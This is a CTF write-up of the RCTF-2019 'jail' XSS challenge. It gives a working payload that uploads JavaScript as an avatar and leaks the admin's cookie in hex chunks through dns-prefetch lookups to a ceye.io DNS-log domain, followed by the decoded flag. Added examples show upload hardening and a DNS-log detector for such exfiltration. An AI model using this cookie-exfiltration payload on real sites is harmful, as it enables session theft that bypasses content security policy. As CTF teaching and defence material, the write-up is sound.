My XSS is weak, so all I can do is write up the challenges I work through; it is the only way I can think of to get better, so the record starts here.

RCTF-2019 jail

After entering, register and log in.

url:https://jail.2019.rctf.rois.io/
post message

url:https://jail.2019.rctf.rois.io/?action=feedback
Submit the id of a message to the server and the admin will view it.

https://jail.2019.rctf.rois.io/
Delete all messages.

https://jail.2019.rctf.rois.io/?action=profile
The profile page lets you upload an image to change your avatar.

On the profile page, any uploaded php file gets turned into a jpg, and this is obviously an XSS challenge; the message page itself does not let you XSS.

I had no idea; only after reading pakho's writeup did I learn the route: first upload js as the avatar, then put the XSS payload into a posted message, then hand that message's id to the admin to visit.
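The upload step is the root cause worth fixing: the avatar endpoint rewrote a .php upload into a .jpg but stored a .js as-is and then served it from /uploads/ on the site's own origin, which is all a `<script src="/uploads/...js">` in a message needs. The following is an added example of how such an endpoint can be hardened; it is not the challenge's code. The JPEG and PNG signatures are the standard ones, the function names and return shape are this example's own, and the caller is assumed to supply a random id (storedBase) for the stored file so the user's file name never reaches disk.

```javascript
// Added example, not the challenge's own code: validate an avatar upload by
// content rather than by the name the user supplied, store it under a
// caller-provided random id with an extension derived from the detected
// format, and serve it with headers that stop a browser executing it as script.

// Magic bytes for the only two formats an avatar endpoint needs to accept.
const SIGNATURES = [
  { type: 'image/jpeg', ext: 'jpg', magic: [0xff, 0xd8, 0xff] },
  { type: 'image/png', ext: 'png', magic: [0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a] },
];

// Return the signature entry whose magic bytes open the buffer, or null.
function sniffImage(bytes) {
  return SIGNATURES.find((s) => s.magic.every((b, i) => bytes[i] === b)) || null;
}

// Decide whether an upload is accepted and, if so, how it is stored and served.
// storedBase is a random id chosen by the caller (hypothetical parameter).
function validateAvatar(originalName, bytes, storedBase) {
  const m = originalName.match(/\.([^.]+)$/);
  const ext = m ? m[1].toLowerCase() : '';
  if (!['jpg', 'jpeg', 'png'].includes(ext)) {
    return { ok: false, reason: 'extension not allowed' };
  }
  const sig = sniffImage(bytes);
  if (!sig) return { ok: false, reason: 'content is not a JPEG or PNG' };
  // A .jpg that is really a PNG (or vice versa) is rejected rather than renamed.
  if ((ext === 'png') !== (sig.type === 'image/png')) {
    return { ok: false, reason: 'extension does not match content' };
  }
  return {
    ok: true,
    storedName: `${storedBase}.${sig.ext}`,
    // Serve with the detected type and nosniff: with these headers a browser
    // refuses to run the file as JavaScript even if a page references it via
    // <script src>, so a same-origin /uploads/ path no longer doubles as a script host.
    headers: {
      'Content-Type': sig.type,
      'X-Content-Type-Options': 'nosniff',
      'Content-Disposition': `inline; filename="${storedBase}.${sig.ext}"`,
    },
  };
}

// Constructed inputs for a quick run: a script body, a PNG header, a JPEG header.
const jsBody = Buffer.from('function Strtohex(Things){}', 'utf8');
const pngHeader = Buffer.from([0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a, 0, 0, 0, 13]);
const jpegHeader = Buffer.from([0xff, 0xd8, 0xff, 0xe0, 0x00, 0x10]);

console.log(validateAvatar('2.js', jsBody, 'deadbeef'));      // rejected: extension
console.log(validateAvatar('2.jpg', jsBody, 'deadbeef'));     // rejected: not an image
console.log(validateAvatar('me.png', pngHeader, 'deadbeef')); // accepted as deadbeef.png
console.log(validateAvatar('me.jpg', pngHeader, 'deadbeef')); // rejected: mismatch
console.log(validateAvatar('me.jpeg', jpegHeader, 'deadbeef'));
```

Serving user uploads from a separate origin (a dedicated static host or a sandboxed subdomain) is the stronger fix, because it keeps uploaded bytes out of the application's origin entirely; the checks above are what to do when the files must stay where they are.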

And the cookie carries two hints:
[screenshots of the two hint cookies]
Meta redirects are blocked, so pakho used the link tag's prefetching instead:
https://blog.csdn.net/qq_31481187/article/details/53027208
Construct:

<link rel="dns-prefetch" href="//[cookie].xxx.ceye.io">

payload
2.js

function Strtohex(Things){
    // hex-encode every character (no zero padding; fine for printable ASCII,
    // which always yields two hex digits)
    var str = '';
    for (var i = 0; i < Things.length ; i++) {
        str += Things[i].charCodeAt(0).toString(16);
    }
    return str;
}
// leak document.cookie in three 20-character chunks, one dns-prefetch lookup
// per chunk: the hex string becomes a subdomain under the ceye.io DNS log domain,
// so the value shows up in the resolver log without any HTTP request
for (var off = 0; off < 60; off += 20) {
    var l = document.createElement('link');
    l.setAttribute('rel', 'dns-prefetch');
    l.setAttribute('href', '//' + Strtohex(document.cookie.substr(off, 20)) + '.lekg1p.ceye.io');
    document.head.appendChild(l);
}
  • Upload 2.js as the avatar.
    View the page source to get the image's address.
    [screenshot of the uploaded file's path in the page source]

  • Construct the XSS in a message:

<script src="/uploads/0de87eb8ec27447b6be5586edfca7154.js"></script>

Check the message id:
[screenshot of the message id]

  • Post the id to admin.
    [screenshot of the feedback submission]

[screenshot of the DNS records received on ceye.io]

5f7468655f6368616f735f77307231647d3b2050.lekg1p.ceye.io
48505345535349443d3531653138366666353662.lekg1p.ceye.io
666c61673d524354467b77656c63306d655f7430.lekg1p.ceye.io

Decode the hex:

"666c61673d524354467b77656c63306d655f7430".decode("hex")
'flag=RCTF{welc0me_t0'
"5f7468655f6368616f735f77307231647d3b2050".decode("hex")
'_the_chaos_w0r1d}; P'
"48505345535349443d3531653138366666353662".decode("hex")
'HPSESSID=51e186ff56b'
flag=RCTF{welc0me_t0_the_chaos_w0r1d}
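Two points from this exchange matter outside the CTF. The dns-prefetch trick works because a DNS lookup is not a fetch, so CSP directives such as connect-src and img-src never see it; the only place it shows up is the resolver log. And the whole leak depended on the flag living in a cookie that document.cookie could read, which the HttpOnly flag would have prevented. The following is an added example, not part of the writeup, of the detection-side counterpart to the decode step above: scanning DNS query logs for long hex labels that decode to printable text, and decoding what was leaked. The three hostnames are the ones shown on this page; the log line format, timestamps, client address and the benign entries are constructed for the example.

```javascript
// Added example, not from the original writeup: triage DNS query logs for
// chunked hex-encoded exfiltration (as the payload above does with
// document.cookie, 20 characters per lookup) and decode the chunks.
// Constructed log: "<timestamp> <client> <qtype> <qname>"; the three
// lekg1p.ceye.io names are the ones observed on the page, the rest is made up.
const dnsLog = [
  '2019-05-19T03:14:09Z 10.0.0.5 A 5f7468655f6368616f735f77307231647d3b2050.lekg1p.ceye.io',
  '2019-05-19T03:14:09Z 10.0.0.5 A 48505345535349443d3531653138366666353662.lekg1p.ceye.io',
  '2019-05-19T03:14:09Z 10.0.0.5 A 666c61673d524354467b77656c63306d655f7430.lekg1p.ceye.io',
  '2019-05-19T03:14:10Z 10.0.0.5 A www.example.com',
  // a content-hash label: hex of the right length, but it is not text
  '2019-05-19T03:14:10Z 10.0.0.5 A da39a3ee5e6b4b0d3255bfef95601890afd80709.cdn.example.net',
];

const HEX_LABEL = /^(?:[0-9a-f]{2})+$/i;

// Decode a hex label to text, or return null if it is not hex or the bytes
// fall outside printable ASCII. CDN and cache-busting hashes are hex too,
// but they do not decode to text, so this check removes that false positive.
function decodeHexLabel(label) {
  if (!HEX_LABEL.test(label)) return null;
  const text = Buffer.from(label, 'hex').toString('latin1');
  return /^[\x20-\x7e]+$/.test(text) ? text : null;
}

// A leftmost label of at least minHexLen hex characters that decodes to
// printable text is classified as an exfiltration chunk.
function classifyHostname(hostname, minHexLen = 32) {
  const label = hostname.split('.')[0];
  if (label.length < minHexLen) return null;
  const decoded = decodeHexLabel(label);
  return decoded === null ? null : { hostname, label, decoded };
}

// Scan log lines (query name is the last whitespace-separated field) and
// return the suspicious queries together with their decoded contents.
function findExfilChunks(lines) {
  const hits = [];
  for (const line of lines) {
    const fields = line.trim().split(/\s+/);
    const hit = classifyHostname(fields[fields.length - 1]);
    if (hit) hits.push(hit);
  }
  return hits;
}

// Arrival order in a DNS log is not the order the chunks were sent: the
// lookups are issued concurrently and may be cached along the way, and the
// ceye.io listing on this page shows them out of order too. The analyst
// therefore establishes the order from content (cookie syntax) and passes it in.
function reassemble(hits, orderedLabels) {
  const byLabel = new Map(hits.map((h) => [h.label, h.decoded]));
  return orderedLabels.map((l) => byLabel.get(l) || '').join('');
}

const hits = findExfilChunks(dnsLog);
for (const h of hits) console.log(h.hostname, '->', JSON.stringify(h.decoded));
console.log(reassemble(hits, [
  '666c61673d524354467b77656c63306d655f7430',
  '5f7468655f6368616f735f77307231647d3b2050',
  '48505345535349443d3531653138366666353662',
]));
```

The minimum label length of 32 hex characters is a tuning knob: the payload on this page produces 40-character labels, and shorter ones will mostly be noise, but an attacker can shrink the chunk size, so a production rule would also count distinct hex labels per parent domain per client over a time window.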
Categories: webxss
